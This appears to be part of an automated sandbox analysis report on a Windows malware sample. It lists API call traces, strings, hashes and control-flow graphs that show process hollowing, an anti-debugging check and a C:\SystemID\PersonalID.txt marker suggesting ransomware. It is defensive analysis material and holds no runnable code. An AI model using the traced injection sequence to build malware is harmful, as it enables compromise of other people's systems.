                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: .\crypto\asn1\tasn_new.c
                                • API String ID: 2102423945-2878120539
                                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                APIs
                                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                • TranslateMessage.USER32(?), ref: 0041B4CD
                                • DispatchMessageW.USER32(?), ref: 0041B4D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                • String ID: %username%$I:\5d2860c89d774.jpg
                                • API String ID: 441990211-897913220
                                • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .\crypto\err\err.c$unknown
                                • API String ID: 0-565200744
                                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                APIs
                                • _memset.LIBCMT ref: 0042419D
                                • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: DebuggerPresent_memset
                                • String ID: i;B
                                • API String ID: 2328436684-472376889
                                • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: 8Q
                                • API String ID: 3761405300-2096853525
                                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                APIs
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                • _memset.LIBCMT ref: 00413C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                • String ID: vector<T> too long
                                • API String ID: 1327501947-3788999226
                                • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _fputws$CreateDirectory
                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                • API String ID: 2590308727-54166481
                                • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                APIs
                                Strings
                                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt
                                • String ID: Assertion failed: %s, file %s, line %d
                                • API String ID: 3494438863-969893948
                                • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                APIs
                                • _memset.LIBCMT ref: 00480686
                                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                Strings
                                • .\crypto\evp\digest.c, xrefs: 00480638
                                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset_raise
                                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                • API String ID: 1484197835-3867593797
                                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                APIs
                                • std::exception::exception.LIBCMT ref: 0044F251
                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                • __CxxThrowException@8.LIBCMT ref: 0044F266
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                • String ID: TeM
                                • API String ID: 757275642-2215902641
                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                                Execution Graph

                                Execution Coverage:1.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:38
                                Total number of Limit Nodes:8
                                execution_graph 33572 2200000 33575 2200630 33572->33575 33574 2200005 33576 220064c 33575->33576 33578 2201577 33576->33578 33581 22005b0 33578->33581 33584 22005dc 33581->33584 33582 22005e2 GetFileAttributesA 33582->33584 33583 220061e 33584->33582 33584->33583 33586 2200420 33584->33586 33587 22004f3 33586->33587 33588 22004fa 33587->33588 33589 22004ff CreateWindowExA 33587->33589 33588->33584 33589->33588 33590 2200540 PostMessageA 33589->33590 33591 220055f 33590->33591 33591->33588 33593 2200110 VirtualAlloc GetModuleFileNameA 33591->33593 33594 2200414 33593->33594 33595 220017d CreateProcessA 33593->33595 33594->33591 33595->33594 33597 220025f VirtualFree VirtualAlloc Wow64GetThreadContext 33595->33597 33597->33594 33598 22002a9 ReadProcessMemory 33597->33598 33599 22002e5 VirtualAllocEx NtWriteVirtualMemory 33598->33599 33600 22002d5 NtUnmapViewOfSection 33598->33600 33603 220033b 33599->33603 33600->33599 33601 2200350 NtWriteVirtualMemory 33601->33603 33602 220039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33604 22003fb ExitProcess 33602->33604 33603->33601 33603->33602 33606 2164026 33607 2164035 33606->33607 33610 21647c6 33607->33610 33611 21647e1 33610->33611 33612 21647ea CreateToolhelp32Snapshot 33611->33612 33613 2164806 Module32First 33611->33613 33612->33611 33612->33613 33614 2164815 33613->33614 33616 216403e 33613->33616 33617 2164485 33614->33617 33618 21644b0 33617->33618 33619 21644c1 VirtualAlloc 33618->33619 33620 21644f9 33618->33620 33619->33620 33620->33620

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02200156
                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0220016C
                                • CreateProcessA.KERNELBASE(?,00000000), ref: 02200255
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02200270
                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02200283
                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0220029F
                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022002C8
                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022002E3
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02200304
                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0220032A
                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02200399
                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022003BF
                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022003E1
                                • ResumeThread.KERNELBASE(00000000), ref: 022003ED
                                • ExitProcess.KERNEL32(00000000), ref: 02200412
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                • String ID:
                                • API String ID: 93872480-0
                                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                • Instruction ID: a0202c892e271ddaadd819177e27cc7667e59549a2e955665cfeb448d6d2d049
                                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                • Instruction Fuzzy Hash: DAB1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB395D771AE41CF94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 15 2200420-22004f8 17 22004fa 15->17 18 22004ff-220053c CreateWindowExA 15->18 21 22005aa-22005ad 17->21 19 2200540-2200558 PostMessageA 18->19 20 220053e 18->20 22 220055f-2200563 19->22 20->21 22->21 23 2200565-2200579 22->23 23->21 25 220057b-2200582 23->25 26 2200584-2200588 25->26 27 22005a8 25->27 26->27 28 220058a-2200591 26->28 27->22 28->27 29 2200593-2200597 call 2200110 28->29 31 220059c-22005a5 29->31 31->27
                                APIs
                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02200533
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateWindow
                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                • API String ID: 716092398-2341455598
                                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                • Instruction ID: d8829cd6177f25979f7e3edf2faa6696e199d7691e64dd719d2d3703a242faad
                                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                • Instruction Fuzzy Hash: 51511870D08388DAEB11CBE8C849BDDBFB2AF15708F144058D5447F2CAC7BA5658CB66

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 32 22005b0-22005d5 33 22005dc-22005e0 32->33 34 22005e2-22005f5 GetFileAttributesA 33->34 35 220061e-2200621 33->35 36 2200613-220061c 34->36 37 22005f7-22005fe 34->37 36->33 37->36 38 2200600-220060b call 2200420 37->38 40 2200610 38->40 40->36
                                APIs
                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022005EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID: apfHQ$o
                                • API String ID: 3188754299-2999369273
                                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                • Instruction ID: 1269166bd6169578eed2a0d7dce0904b5e1d185ace077e74280f4cd1b2785b29
                                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                • Instruction Fuzzy Hash: CF011E70C0425DEAEB10DBD8C5583EEBFB5AF41308F188099C4092B282D7B69B58CBA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 41 21647c6-21647df 42 21647e1-21647e3 41->42 43 21647e5 42->43 44 21647ea-21647f6 CreateToolhelp32Snapshot 42->44 43->44 45 2164806-2164813 Module32First 44->45 46 21647f8-21647fe 44->46 47 2164815-2164816 call 2164485 45->47 48 216481c-2164824 45->48 46->45 51 2164800-2164804 46->51 52 216481b 47->52 51->42 51->45 52->48
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021647EE
                                • Module32First.KERNEL32(00000000,00000224), ref: 0216480E
                                Memory Dump Source
                                • Source File: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, Offset: 02164000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2164000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: f62e5f30a48013b74f0a2e47ea9ed906b812704fbf8bb6a996875dbd90bfeeff
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: 28F062352407116FD7303BF5A88DB7E76FCAF49625F100639E642914C0DB70E8558A61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 54 2164485-21644bf call 2164798 57 21644c1-21644f4 VirtualAlloc call 2164512 54->57 58 216450d 54->58 60 21644f9-216450b 57->60 58->58 60->58
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021644D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, Offset: 02164000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2164000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: 2640633bb5c7a8d1a934f743976ad3621ed6e58d9f7421132570d90daf158ecf
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: E8113C79A40208EFDB01DF98C989E9DBBF5AF08751F058094F9489B361D371EA90DF80

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 551 2226437-2226440 552 2226442-2226446 551->552 553 2226466 551->553 552->553 555 2226448-2226459 call 2229636 552->555 554 2226468-222646b 553->554 558 222645b-2226460 call 2225ba8 555->558 559 222646c-222647d call 2229636 555->559 558->553 564 2226488-222649a call 2229636 559->564 565 222647f-2226480 call 222158d 559->565 570 22264ac-22264cd call 2225f4c call 2226837 564->570 571 222649c-22264aa call 222158d * 2 564->571 568 2226485-2226486 565->568 568->558 580 22264e2-2226500 call 222158d call 2224edc call 2224d82 call 222158d 570->580 581 22264cf-22264dd call 222557d 570->581 571->568 589 2226507-2226509 580->589 586 2226502-2226505 581->586 587 22264df 581->587 586->589 587->580 589->554
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                • String ID:
                                • API String ID: 1442030790-0
                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction ID: 10a87bebd42359063b6c8abeb5145a9684f6a1f3653e1b9619ffff20842f5482
                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction Fuzzy Hash: 6A21A432124731BAE7317FE5DC01E6B7BDEDF41B60BA08019E489590ACEB238568CE51

                                Control-flow Graph

                                APIs
                                • std::exception::exception.LIBCMT ref: 0224FC1F
                                  • Part of subcall function 0223169C: std::exception::_Copy_str.LIBCMT ref: 022316B5
                                • __CxxThrowException@8.LIBCMT ref: 0224FC34
                                • std::exception::exception.LIBCMT ref: 0224FC4D
                                • __CxxThrowException@8.LIBCMT ref: 0224FC62
                                • std::regex_error::regex_error.LIBCPMT ref: 0224FC74
                                  • Part of subcall function 0224F914: std::exception::exception.LIBCMT ref: 0224F92E
                                • __CxxThrowException@8.LIBCMT ref: 0224FC82
                                • std::exception::exception.LIBCMT ref: 0224FC9B
                                • __CxxThrowException@8.LIBCMT ref: 0224FCB0
                                Strings
                                • ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom. , xrefs: 0224FCB6
                                • leM, xrefs: 0224FCA8
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                • String ID: leM$ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom.
                                • API String ID: 3569886845-85255083
                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction ID: 8a7e77600f2b51b819a142da181d6015eab49f63ba318b116a24543bd6ea0f8b
                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction Fuzzy Hash: 3E111CB9D0030DBBCF05FFE5D455CDEBB7DAA04340B408566AD1897244EB74A3588F98

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 612 2223f16-2223f2f 613 2223f31-2223f3b call 2225ba8 call 2224c72 612->613 614 2223f49-2223f5e call 222bdc0 612->614 621 2223f40 613->621 614->613 620 2223f60-2223f63 614->620 622 2223f77-2223f7d 620->622 623 2223f65 620->623 626 2223f42-2223f48 621->626 624 2223f89-2223f9a call 2230504 call 22301a3 622->624 625 2223f7f 622->625 627 2223f67-2223f69 623->627 628 2223f6b-2223f75 call 2225ba8 623->628 636 2223fa0-2223fac call 22301cd 624->636 637 2224185-222418f call 2224c9d 624->637 625->628 629 2223f81-2223f87 625->629 627->622 627->628 628->621 629->624 629->628 636->637 642 2223fb2-2223fbe call 22301f7 636->642 642->637 645 2223fc4-2223fcb 642->645 646 222403b-2224046 call 22302d9 645->646 647 2223fcd 645->647 646->626 654 222404c-222404f 646->654 648 2223fd7-2223ff3 call 22302d9 647->648 649 2223fcf-2223fd5 647->649 648->626 657 2223ff9-2223ffc 648->657 649->646 649->648 655 2224051-222405a call 2230554 654->655 656 222407e-222408b 654->656 655->656 665 222405c-222407c 655->665 659 222408d-222409c call 2230f40 656->659 660 2224002-222400b call 2230554 657->660 661 222413e-2224140 657->661 668 22240a9-22240d0 call 2230e90 call 2230f40 659->668 669 222409e-22240a6 659->669 660->661 670 2224011-2224029 call 22302d9 660->670 661->626 665->659 678 22240d2-22240db 668->678 679 22240de-2224105 call 2230e90 call 2230f40 668->679 669->668 670->626 675 222402f-2224036 670->675 675->661 678->679 684 2224113-2224122 call 2230e90 679->684 685 2224107-2224110 679->685 688 2224124 684->688 689 222414f-2224168 684->689 685->684 692 2224126-2224128 688->692 693 222412a-2224138 688->693 690 222416a-2224183 689->690 691 222413b 689->691 690->661 691->661 692->693 694 2224145-2224147 692->694 693->691 694->661 695 2224149 694->695 695->689 696 